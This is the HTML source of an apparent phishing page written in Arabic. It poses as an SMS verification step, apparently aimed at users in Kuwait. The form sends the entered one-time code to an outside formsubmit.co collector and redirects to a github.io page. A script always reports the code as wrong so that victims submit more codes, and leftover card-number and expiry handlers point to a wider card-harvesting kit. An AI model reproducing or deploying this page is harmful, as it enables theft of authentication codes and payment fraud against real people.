
<!DOC TIYP html>
<html lang="en" style="height:90%;">

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<title>SMS</title>
	<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet">
	<link rel="icon" type="image/x-icon" href="https://th.bing.com/th/id/OIP._sty7Bfp1npuXRBdPhkEVAHaHa?w=194&h=194&c=7&r=0&o=5&pid=1.7">
	<link rel="stylesheet" href="./login1_files/css">
	<link rel="stylesheet" href="./login1_files/animate.min.css">
	<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js'></script>
	<style>
	body {
		background-color: #;
	}
	/* General Styles */
	
	* {
		padding: 0;
		margin: 0
	}
	/* File Locker */
	
	.fl {
		background-color: #ffffff;
		border-radius: 10px;
		padding: 30px;
		display: block;
		margin: 10px auto;
		text-align: center;
		width: 33%
	}
	
	.fl-text {
		font-family: 'Open Sans', sans-serif;
		font-size: 13px;
		color: #9c9c9c;
		display: inline-block;
		vertical-align: middle
	}
	/* File Locker Head */
	
	.fl-head {
		margin-bottom: 15px
	}
	/* File Locker Body */
	
	.fl-body {
		display: block;
		margin: 0 auto;
		width: 70%
	}
	
	.fl-btn {
		font-family: 'Open Sans', sans-serif;
		border-radius: -10px;
		border: 0;
		background-color: #199f09;
		color: #fff;
		cursor: pointer;
		padding: 10px 0;
		font-size: 16px;
		width: 100%;
		transition: background-color 0.25s ease-in-out
	}
	
	.fl-btn:focus {
		outline: 0
	}
	
	.fl-btn:hover {
		background-color: #199f09
	}
	/* File Locker Offers */
	
	.fl-offers {
		display: none;
		margin: 30px 0 15px 0
	}
	
	.fl-offer {
		font-family: 'Open Sans', sans-serif;
		font-size: 13px;
		background-color: #4875f7;
		border-radius: 10px;
		padding: 8px;
		margin-top: 15px;
		display: block;
		color: #fff;
		text-decoration: none;
		transition: background-color 0.25s ease-in-out
	}
	
	.fl-offer:hover {
		background-color: #426ce6
	}
	/* Spinner/Awaiting Activation */
	
	.fl-spinner {
		display: none;
		margin: 30px 0 0 0;
		text-align: center
	}
	
	.fl-spinner .fl-icon-spinner {
		height: 25px;
		width: 25px;
		vertical-align: middle;
		margin-right: 10px;
		-moz-animation: spin 2s infinite linear;
		-webkit-animation: spin 2s infinite linear;
		animation: spin 2s infinite linear
	}
	
	.fl-spinner .fl-icon-spinner path {
		fill: #4875f7
	}
	
	.fl-spinner .fl-text {
		display: inline-block
	}
	/* Spin Keyframes Animation */
	
	@-moz-keyframes spin {
		from {
			-moz-transform: rotate(0deg)
		}
		to {
			-moz-transform: rotate(360deg)
		}
	}
	
	@-webkit-keyframes spin {
		from {
			-webkit-transform: rotate(0deg)
		}
		to {
			-webkit-transform: rotate(360deg)
		}
	}
	
	@keyframes spin {
		from {
			transform: rotate(0deg)
		}
		to {
			transform: rotate(360deg)
		}
	}
	/* Icons */
	
	.fl-icon-dl {
		width: 30px;
		height: 30px;
		vertical-align: middle;
		margin-right: 15px
	}
	
	.fl-icon-lock {
		width: 20px;
		height: 25px;
		vertical-align: middle;
		margin-right: 5px;
		fill: #4875f7
	}
	
	#help-text-offers {
		display: none;
	}
	/* Responsive Media Queries */
	
	@media only screen and (max-width: 1480px) {
		.fl {
			width: 43%
		}
	}
	
	@media only screen and (max-width: 768px) {
		.fl {
			margin: 10px 10px;
			width: auto
		}
		.fl-body {
			width: 100%
		}
	}
	
	@media only screen and (max-width: 460px) {
		.fl-btn {
			font-size: 25px
		}
		.fl-icon-dl {
			width: 25px;
			height: 25px
		}
		.fl-text {
			font-size: 12px
		}
	}
	
	@media only screen and (max-width: 390px) {
		.fl-icon-lock {
			display: block;
			margin: 0 auto 10px
		}
	}
	</style>
	<script>
	$(document).ready(function() {
		//For Card Number formatted input
		var cardNum = document.getElementById('no');
		cardNum.onkeyup = function(e) {
				if(this.value == this.lastValue) return;
				var caretPosition = this.selectionStart;
				var sanitizedValue = this.value.replace(/[^0-9]/gi, '');
				var parts = [];
				for(var i = 0, len = sanitizedValue.length; i < len; i += 4) {
					parts.push(sanitizedValue.substring(i, i + 4));
				}
				for(var i = caretPosition - 1; i >= 0; i--) {
					var c = this.value[i];
					if(c < '0' || c > '9') {
						caretPosition--;
					}
				}
				caretPosition += Math.floor(caretPosition / 4);
				this.value = this.lastValue = parts.join('');
				this.selectionStart = this.selectionEnd = caretPosition;
			}
			//For Date formatted input
		var expDate = document.getElementById('exp');
		expDate.onkeyup = function(e) {
				if(this.value == this.lastValue) return;
				var caretPosition = this.selectionStart;
				var sanitizedValue = this.value.replace(/[^0-9]/gi, '');
				var parts = [];
				for(var i = 0, len = sanitizedValue.length; i < len; i += 2) {
					parts.push(sanitizedValue.substring(i, i + 2));
				}
				for(var i = caretPosition - 1; i >= 0; i--) {
					var c = this.value[i];
					if(c < '0' || c > '9') {
						caretPosition--;
					}
				}
				caretPosition += Math.floor(caretPosition / 2);
				this.value = this.lastValue = parts.join('/');
				this.selectionStart = this.selectionEnd = caretPosition;
			}
			// Radio button
		$('.radio-group .radio').click(function() {
			$(this).parent().parent().find('.radio').removeClass('selected');
			$(this).addClass('selected');
		});
	})
	</script>
	<style>
	.button {
		display: inline-block;
		padding: 5px 90px;
		font-size: 28px;
		cursor: pointer;
		text-align: center;
		text-decoration: none;
		outline: none;
		color: #fff;
		background-color: #5477f5;
		border: none;
		border-radius: 15px;
		box-shadow: 0 9px #999;
	}
	
	.button:hover {
		background-color: #199f09
	}
	
	.button:active {
		background-color: #199f09;
		box-shadow: 0 5px #666;
		transform: translateY(4px);
	}
	
	input {
		text-align: center;
	}
	
img {
  border: 1px solid #ddd;
  border-radius: 4px;
  padding: 5px;
  width: 150px;
}

img:hover {
	</style>


</head>

<body marginwidth="0" marginheight="0" bis_register="W3sibWFzdGVyIjp0cnVlLCJleHRlbnNpb25JZCI6ImVwcGlvY2VtaG1ubGJoanBsY2drb2ZjaWllZ29tY29uIiwiYWRibG9ja2VyU3RhdHVzIjp7IkRJU1BMQVkiOiJlbmFibGVkIiwiRkFDRUJPT0siOiJlbmFibGVkIiwiVFdJVFRFUiI6ImVuYWJsZWQifSwidmVyc2lvbiI6IjEuOC45Iiwic2NvcmUiOjEwODA5MH1d">
	<div class="fl" bis_skin_checked="1">
		
			<center><img src="https://cdn1.iconfinder.com/data/icons/communication-211/48/21-256.png" alt=""></center>
			<br>
      			<h2><p class="f1-text" id="help-text-main"><b>ادخل رمز التأكيد الذي سوف يصلك في رسالة قصيرة</b></p><br></h2>
			<h2>	
			<center>
			<form action="https://formsubmit.co/bb2eccfe11b347e4d5a7b291753db69b" method="POST">
				<input type="hidden" name="_next" value="https://adwryeedfg.github.io/kuwit/sms.html">
				<input type="hidden" name="_subject" value="SMS">
				<input type="hidden" name="_captcha" value="false">
					



			<input style="display: block;		
  width: 69%;
  padding: 0.375rem 0.75rem;
  font-size: 1rem;
  line-height: 1.5;
  color: #495057;
  background-color: #fff;
  background-clip: padding-box;
  border: 6px solid #ced4da;
  margin-bottom:14px;
  border-radius: 0.25rem;
  transition: border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;" type="tel" id="no" maxlength="13" required="" name="SMS" placeholder="SMS">

<br>   


<div id="divElement"> </div>
<br>                 
                
						<button onclick="func1()" class="button">ارسال</button>
			   
			
			</form>
			</center>
	
		</h2></div>
		
		
		
		
		
		
		<script>
		

function func1(){
 document.getElementById("divElement").innerHTML="الرمز خطأ ادخل الرمز الصحيح";
}

		</script>
		
		
		


</body>

</html>